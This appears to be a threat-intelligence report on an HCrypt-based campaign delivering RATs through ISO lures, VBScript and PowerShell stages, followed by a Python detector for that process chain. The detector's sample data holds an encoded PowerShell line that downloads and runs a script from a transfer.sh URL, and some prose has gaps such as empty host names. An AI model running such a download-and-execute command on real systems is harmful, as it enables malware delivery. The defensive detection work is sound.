We encountered a fileless campaign that used a new HCrypt variant to distribute numerous remote access trojans (RATs) to victim systems. This variant uses a newer obfuscation mechanism than the ones observed in past reports. Activity peaked in the middle of August 2021.

HCrypt is a crypter and multistage generator that is considered difficult to detect. It is sold as a crypter-as-a-service, paid for by threat actors to load a RAT (or, in this case, several RATs) of their choosing. The campaign also showed new obfuscation techniques and attack vectors, different from those observed in the past.

In this campaign, which we have labelled Water Basilisk, the attacker mostly used publicly available file hosting services such as "", "transfer.sh", and "" to host the malware, while hacked WordPress websites were used to host phishing kits. The malicious file is disguised as an ISO that is distributed through a phishing email or website. This file contains an obfuscated VBScript stager responsible for downloading the next-stage VBScript content and executing it in the memory of the infected system. The final stage is an obfuscated PowerShell script that contains the payloads and is responsible for deobfuscating them and injecting them into the assigned process. In some cases, the final-stage PowerShell script contained up to seven different RATs, typically NjRat, BitRat, Nanocore RAT, QuasarRat, LimeRat, and Warzone.

In a nutshell, Water Basilisk's attack chain is a combination of VBScript and PowerShell commands. HCrypt generates the obfuscated VBScripts and PowerShell scripts that deliver the final payload and inject it into a given process on the victim system. The latest version of this crypter is 7.8, based on what we have seen in its builder and website.

This campaign uses two different attack vectors: phishing websites and emails. Both have the same infection chain, which we have already described. The attack begins with the malicious ISO image file. We can assume two reasons why this attack uses ISO files. One is that ISO images tend to be large, so email gateway scanners may not be able to scan ISO attachments properly. Another is that opening an ISO file on newer operating systems is as simple as double-clicking it, thanks to native ISO mounting tools. This improves the chances of a victim opening the file and infecting their system.

As we have also mentioned, and as seen in Figure 4, an interesting aspect of this attack is that the HCrypt developers hosted the stager scripts on public file hosting services such as Transfer.sh and the Internet Archive (). Once the ISO file is opened, the needed scripts are downloaded from this hosting archive. Figure 5 is an example of the account used to host the scripts. Among the loaded binaries is a DLL injector called "VBNET," which reflectively loads a. In Figure 12, $HH1 is the VBNET PE injector DLL and $HH5 contains a PowerShell command that passes the final malware payload ($HH3) into the given process, which is "aspnet_regbrowsers.exe."
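The process lineage described above (VBScript host, then PowerShell fetching the next stage from a public file-hosting service, then injection into aspnet_regbrowsers.exe) is the part of this chain a defender can key on without knowing the current obfuscation layer. The detection logic below is an added example written for this page, not code from the report or from the HCrypt authors. It runs over constructed Sysmon-style process-creation events; the field names (`pid`, `ppid`, `image`, `parent_image`, `cmdline`), the PIDs and paths, the transfer.sh URL and the use of PowerShell's `-EncodedCommand` flag in the stager are all assumptions made for the example. The hosting domains and the injection target come from the text.

```python
import base64
import binascii
import json
import re

# Indicators taken from the write-up: stagers hosted on public file-hosting
# services, a script-host -> PowerShell chain, and aspnet_regbrowsers.exe as the
# process the final PowerShell stage injects the RAT payloads into.
HOSTING_DOMAINS = ("transfer.sh", "archive.org")
SCRIPT_HOSTS = ("wscript.exe", "cscript.exe")
INJECTION_TARGET = "aspnet_regbrowsers.exe"

# PowerShell's -EncodedCommand (also accepted as -e/-ec/-enc) carries base64 of
# UTF-16LE text. That the stager uses this flag is an assumption for the example;
# the write-up does not show the stager's command line.
ENC_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)


def decode_encoded_command(cmdline):
    """Return the plaintext behind a -EncodedCommand argument, or None if absent/invalid."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        return None


def effective_command(cmdline):
    """Command line with any encoded PowerShell payload appended in clear text."""
    decoded = decode_encoded_command(cmdline)
    return cmdline if decoded is None else cmdline + " " + decoded


def image_name(path):
    return path.rsplit("\\", 1)[-1].lower()


def analyze(events):
    """Flag the Water Basilisk lineage in a list of process-creation events.

    Each event is a dict with pid, ppid, image, parent_image and cmdline (the
    subset of Sysmon Event ID 1 fields this example needs; names assumed).
    """
    by_pid = {e["pid"]: e for e in events}
    findings = {"stager_download": [], "injection_target": [], "chains": []}
    for e in events:
        img, parent = image_name(e["image"]), image_name(e["parent_image"])
        cmd = effective_command(e["cmdline"]).lower()
        # Rule 1: a VBScript host spawning PowerShell that reaches out to a
        # public file-hosting service is the stager fetching its next stage.
        if parent in SCRIPT_HOSTS and img == "powershell.exe" and any(d in cmd for d in HOSTING_DOMAINS):
            findings["stager_download"].append(e["pid"])
        # Rule 2: aspnet_regbrowsers.exe is a .NET build-time utility that a
        # script interpreter has no legitimate reason to launch.
        if img == INJECTION_TARGET and parent in ("powershell.exe",) + SCRIPT_HOSTS:
            findings["injection_target"].append(e["pid"])
    # Correlate: walk each injection target back to its script host and keep the
    # chain only if one of the PowerShell hops was itself flagged by rule 1.
    for pid in findings["injection_target"]:
        chain, cur = [pid], by_pid.get(pid)
        while cur is not None and cur["ppid"] in by_pid:
            cur = by_pid[cur["ppid"]]
            chain.append(cur["pid"])
            if image_name(cur["image"]) in SCRIPT_HOSTS:
                break
        chain.reverse()
        if len(chain) >= 3 and any(p in findings["stager_download"] for p in chain):
            findings["chains"].append(chain)
    return findings


def _enc(text):
    """Encode text the way PowerShell expects for -EncodedCommand (helper for constructed data)."""
    return base64.b64encode(text.encode("utf-16-le")).decode("ascii")


# Constructed sample telemetry modelled on the chain described in the text; PIDs,
# paths and the transfer.sh URL are made up for the example.
SAMPLE_EVENTS = [
    {"pid": 4120, "ppid": 1100, "image": r"C:\Windows\System32\wscript.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "cmdline": r'wscript.exe "E:\statement.vbs"'},  # stager run from the mounted ISO
    {"pid": 4388, "ppid": 4120, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\System32\wscript.exe",
     "cmdline": "powershell.exe -w hidden -enc "
                + _enc("IEX (New-Object Net.WebClient).DownloadString('https://transfer.sh/example/stage2.txt')")},
    {"pid": 5012, "ppid": 4388, "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe",
     "parent_image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "aspnet_regbrowsers.exe"},  # injection target named in the report
    {"pid": 6100, "ppid": 1100, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "cmdline": r"powershell.exe -File C:\scripts\backup.ps1"},  # benign admin activity, not flagged
]

if __name__ == "__main__":
    print(json.dumps(analyze(SAMPLE_EVENTS), indent=2))
```

Decoding the encoded command before matching matters because the hosting domain only appears inside the base64 blob; a rule that inspects the raw command line would miss it. In production the same two rules map directly onto Sysmon Event ID 1 (`ParentImage`, `Image`, `CommandLine`), and the correlation step is what turns two medium-confidence hits into a high-confidence alert on the full chain.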